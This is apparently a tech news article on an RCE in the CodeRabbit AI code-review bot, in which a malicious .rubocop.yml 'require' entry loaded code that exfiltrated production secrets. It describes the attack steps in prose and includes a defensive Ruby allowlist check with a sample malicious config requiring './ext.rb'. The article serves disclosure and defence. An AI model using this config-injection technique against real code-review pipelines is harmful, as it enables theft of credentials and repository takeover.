CodeRabbit’s PR hack: RCE, leaked API keys and the million‑repo scare
Remote‑code execution in an AI code‑review tool allowed attackers to siphon Anthropic and OpenAI keys, a GitHub app private key and more. Here’s why the incident lit up Hacker News – and what it means for your repos.
Picture pushing a harmless pull request and suddenly owning every repository your code‑review assistant touches. That nightmare became reality for researchers who hacked CodeRabbit, one of the most popular AI‑powered review bots on GitHub. By exploiting a humble Ruby linter configuration, they achieved remote‑code execution (RCE), exfiltrated environment variables packed with secrets and even gained potential write access to one million repositories. The hack – shared at Black Hat and quickly trending on social – underscores how a single misconfiguration in AI tooling can jeopardize entire development ecosystems.
The attack chain: when Rubocop becomes a Trojan horse
Researchers from Kudelski Security tried CodeRabbit’s pro plan – which integrates third‑party static analysis tools – and noticed it passed an untrusted `.rubocop.yml` file directly into the Rubocop linter. By exploiting Rubocop’s `require` directive, they wrote an `ext.rb` file that collected the process’s environment variables and sent them back to their server. The steps were shockingly simple: create a trial account, add CodeRabbit to a private repository, push a dummy Ruby file along with the malicious `.rubocop.yml` and `ext.rb`, then wait. When CodeRabbit executed the linter, their code ran in the context of a production server, sending a JSON payload full of secrets.
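The weakness above is that Rubocop hands every `require:` entry of the repository’s config to Ruby’s `require`, and entries beginning with `.` resolve relative to the config file. The following is an added defensive example, not CodeRabbit’s or the researchers’ code: a pre-lint gate that refuses to run the linter when the untrusted `.rubocop.yml` would load anything other than allow‑listed gems. The allowlist and the two sample configs are assumptions constructed for the example.

```ruby
require 'yaml'

# Assumed allowlist: gems this review pipeline permits RuboCop to load.
ALLOWED_REQUIRES = %w[rubocop-rails rubocop-rspec rubocop-performance].freeze

# Inspects the `require:` list of an untrusted .rubocop.yml and returns
# findings (an empty array means the config may be passed to the linter).
# RuboCop passes each entry to Kernel#require; entries starting with "."
# resolve relative to the config file, so "./ext.rb" would load and run
# repository-controlled code inside the linter process.
def audit_rubocop_requires(yaml_text)
  # safe_load also rejects custom !ruby/object tags in the YAML itself.
  config = YAML.safe_load(yaml_text, aliases: true)
  return ['config is not a YAML mapping'] unless config.is_a?(Hash)

  Array(config['require']).map(&:to_s).filter_map do |entry|
    if entry.start_with?('.', '/', '~')
      "require #{entry.inspect} is a file path, not a gem: arbitrary code would run"
    elsif entry.end_with?('.rb') || entry.include?('/')
      "require #{entry.inspect} looks like a file, not an allow-listed gem"
    elsif !ALLOWED_REQUIRES.include?(entry)
      "require #{entry.inspect} is not on the allowlist"
    end
  end
rescue Psych::SyntaxError => e
  ["config is not valid YAML: #{e.message}"]
end

def safe_to_lint?(yaml_text)
  audit_rubocop_requires(yaml_text).empty?
end

# Constructed sample configs (not taken from the incident).
MALICIOUS_CONFIG = <<~YAML
  require:
    - rubocop-rspec
    - ./ext.rb
  AllCops:
    TargetRubyVersion: 3.2
YAML

BENIGN_CONFIG = <<~YAML
  require: rubocop-rspec
  Style/StringLiterals:
    EnforcedStyle: double_quotes
YAML

if __FILE__ == $PROGRAM_NAME
  puts audit_rubocop_requires(MALICIOUS_CONFIG)
  puts "benign config safe to lint? #{safe_to_lint?(BENIGN_CONFIG)}"
end
```

Run the gate before invoking `rubocop` in the review job and skip linting (or lint with a vendor-controlled config instead) whenever it returns findings; the allowlist is the only thing a pipeline needs to maintain.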
What leaked: a goldmine of secrets
The exfiltrated environment variables read like a developer’s worst nightmare. In addition to AWS and Azure keys, the researchers saw multiple Anthropic and OpenAI API keys, encryption salts, courier notification tokens, JIRA secrets and Pinecone vectors. Most alarmingly, the payload contained CodeRabbit’s GitHub App private key, client ID and client secret. With that RSA key, an attacker could authenticate as CodeRabbit’s app, generate access tokens and clone or modify any repository the app had permission to manage. Considering CodeRabbit advertises itself as the most installed AI app on GitHub and GitLab, the blast radius would have been enormous.
| Category | Examples of leaked secrets | Risk |
|---|---|---|
| AI API keys | Anthropic (paid, free and trial), OpenAI (paid, free and trial) | Could be used to run expensive AI jobs or exfiltrate data through LLMs |
| Infrastructure & DB | PostgreSQL host/user/password, Pinecone API key, AWS & Azure secrets | Remote DB access, vector store compromise, cloud account misuse |
| DevOps tokens | GitHub App private key, GitLab tokens, Jira secrets | Read/write access to repositories, issue trackers and CI/CD pipelines |
| Encryption & auth | Encryption passwords/salts, courier notification tokens | Potential to decrypt sensitive data and hijack notifications |
The researchers stopped short of abusing the keys but demonstrated how to list all CodeRabbit installations and generate fresh access tokens. Since CodeRabbit had been installed over 80,000 times and reviews around a million repositories, the vulnerability could have enabled supply‑chain attacks at scale.
CodeRabbit’s response and lessons learned
To their credit, CodeRabbit patched the flaw rapidly. In a blog post the company stressed that no customer data was accessed and that they disabled Rubocop, rotated potentially impacted credentials and moved linters into a sandboxed environment within hours of disclosure. The case highlights the need for AI tool vendors to treat third‑party integrations as untrusted code and to isolate them accordingly. For users, it’s a reminder to audit the permissions you grant to AI assistants and to monitor for unusual API usage.
Why it matters for developers and businesses
AI code reviewers promise faster pull‑request turnaround and fewer bugs, but they also introduce new supply‑chain attack surfaces. If a malicious actor can smuggle arbitrary code through a configuration file, they may pivot from an isolated repository to a vendor’s production environment. In regulated industries, unauthorized code execution and secret leakage could trigger compliance nightmares. The CodeRabbit incident shows that security researchers are already probing AI coding tools, and vulnerabilities are being weaponized for clout on platforms like Hacker News. Protecting the CI pipeline requires sandboxing, the principle of least privilege and constant secret rotation.
FAQs
How did the researchers get RCE? They exploited Rubocop’s `require` directive to load a malicious Ruby file via a `.rubocop.yml` configuration. When CodeRabbit’s server ran the linter, the file executed and exfiltrated environment variables.
What secrets were exposed? The payload contained multiple Anthropic and OpenAI keys, encryption salts, cloud database credentials, Jira secrets and the CodeRabbit GitHub App private key.
Did attackers actually modify repositories? The researchers didn’t. They demonstrated that the GitHub key could generate tokens with write permissions, but they stopped after confirming the impact.
Is CodeRabbit safe to use now? CodeRabbit says it immediately disabled Rubocop, rotated secrets and deployed a sandbox. Users should ensure they’re running the latest version and review the permissions they grant.